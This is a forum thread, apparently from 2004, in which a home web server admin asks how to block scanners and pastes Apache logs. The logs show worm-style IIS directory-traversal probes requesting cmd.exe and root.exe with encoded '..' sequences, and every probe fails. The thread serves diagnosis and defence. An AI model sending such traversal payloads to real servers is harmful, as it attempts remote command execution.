i don't know about the MAC address, but you can at least trace the IP back to the ISP, then file a complaint with them. try using the tracert <IP> command from the command line

EDIT: you could also try a whois lookup at arin.net. while it wont give you a MAC address it will give you some detailed information about the provider

^ that tool will let you find MAC from IP but i don't think you will be successful untill you actually connect to the machine by way of ping or something like that but you can still try. since this person is sending "time out" while pinging then looks like he/she is running a firewall.

^ that is another site similar to what minibubba suggested.

Your router can only block MAC addresses that are connected Through it.

yeah, i figured that out :oops:
but as I am thinking of using something like www.smoothwall.org for my fireewall, rather than the router.
guess the banning IPs will have to do.

What do you mean, "will have to do" ? Hehe.... It's a flawless system.... 8)

Well, just checking the logs everyday and making sure someone didnt just get a fresh IP. Banning a MAC would make it a lot easier. But oh-well. Tis a job of a admin I guess :wink:

hmm: if you can make a connection of some sort to the machine you should be able to query the physical address [MAC address] with the ARP command like so.

ARP- A a.b.c.d

where a.b.c.d is the ip address..

I just thought of something. How are they trying to hack you?

this is apache's access log


24.17.227.36 - - [19/Mar/2004:02:25:42 -0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 489
24.17.227.36 - - [19/Mar/2004:02:25:42 -0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 489
24.17.227.36 - - [19/Mar/2004:02:25:42 -0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 489
24.17.227.36 - - [19/Mar/2004:02:25:42 -0800] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 489
24.17.227.36 - - [19/Mar/2004:02:25:43 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 489
24.17.227.36 - - [19/Mar/2004:02:25:43 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 489
24.17.227.36 - - [19/Mar/2004:02:25:43 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 489
24.17.227.36 - - [19/Mar/2004:02:25:44 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 489
24.17.227.36 - - [19/Mar/2004:02:25:44 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 489
24.17.227.36 - - [19/Mar/2004:02:25:45 -0800] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 489
24.17.227.36 - - [19/Mar/2004:02:25:45 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 489
24.17.227.36 - - [19/Mar/2004:02:25:45 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 489
24.17.227.36 - - [19/Mar/2004:02:25:45 -0800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 296
24.17.227.36 - - [19/Mar/2004:02:25:45 -0800] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 296
24.17.227.36 - - [19/Mar/2004:02:25:45 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 489
24.17.227.36 - - [19/Mar/2004:02:25:46 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 489



here is error log

[Thu Mar 18 23:57:44 2004] [error] [client 67.167.106.111] File does not exist: C:/Apache2/htdocs/default.ida
[Fri Mar 19 02:25:42 2004] [error] [client 24.17.227.36] File does not exist: C:/Apache2/htdocs/scripts
[Fri Mar 19 02:25:42 2004] [error] [client 24.17.227.36] File does not exist: C:/Apache2/htdocs/MSADC
[Fri Mar 19 02:25:42 2004] [error] [client 24.17.227.36] File does not exist: C:/Apache2/htdocs/c
[Fri Mar 19 02:25:42 2004] [error] [client 24.17.227.36] File does not exist: C:/Apache2/htdocs/d
[Fri Mar 19 02:25:43 2004] [error] [client 24.17.227.36] File does not exist: C:/Apache2/htdocs/scripts
[Fri Mar 19 02:25:43 2004] [error] [client 24.17.227.36] File does not exist: C:/Apache2/htdocs/_vti_bin
[Fri Mar 19 02:25:43 2004] [error] [client 24.17.227.36] File does not exist: C:/Apache2/htdocs/_mem_bin
[Fri Mar 19 02:25:44 2004] [error] [client 24.17.227.36] File does not exist: C:/Apache2/htdocs/msadc
[Fri Mar 19 02:25:44 2004] [error] [client 24.17.227.36] File does not exist: C:/Apache2/htdocs/scripts
[Fri Mar 19 02:25:45 2004] [error] [client 24.17.227.36] File does not exist: C:/Apache2/htdocs/scripts
[Fri Mar 19 02:25:45 2004] [error] [client 24.17.227.36] File does not exist: C:/Apache2/htdocs/scripts
[Fri Mar 19 02:25:45 2004] [error] [client 24.17.227.36] File does not exist: C:/Apache2/htdocs/scripts
[Fri Mar 19 02:25:46 2004] [error] [client 24.17.227.36] File does not exist: C:/Apache2/htdocs/scripts
[Fri Mar 19 05:27:42 2004] [error] [client 67.167.106.111] File does not exist: C:/Apache2/htdocs/default.ida

i get simillar errors from following IPs.
67.163.226.215
67.167.106.39
67.167.115.119
67.168.94.16
67.113.192.182
67.166.183.64
129.25.34.226
67.163.240.32
24.17.227.36

Whois tells me that most of them 67.x.x.x are Comcast :(

I think you'll find most of them are just viruses trying to spread. Blocking or not, you'll still get the traffic. As it's not doing anything, and there's not a lot you can do about it, just let it go.

What ports are you forwarding on your router? Just web/ftp, or did you do something silly like put your webserver in the DMZ?

just forwarding the 80 port,
Decided against DMZ with your (i think) advise :D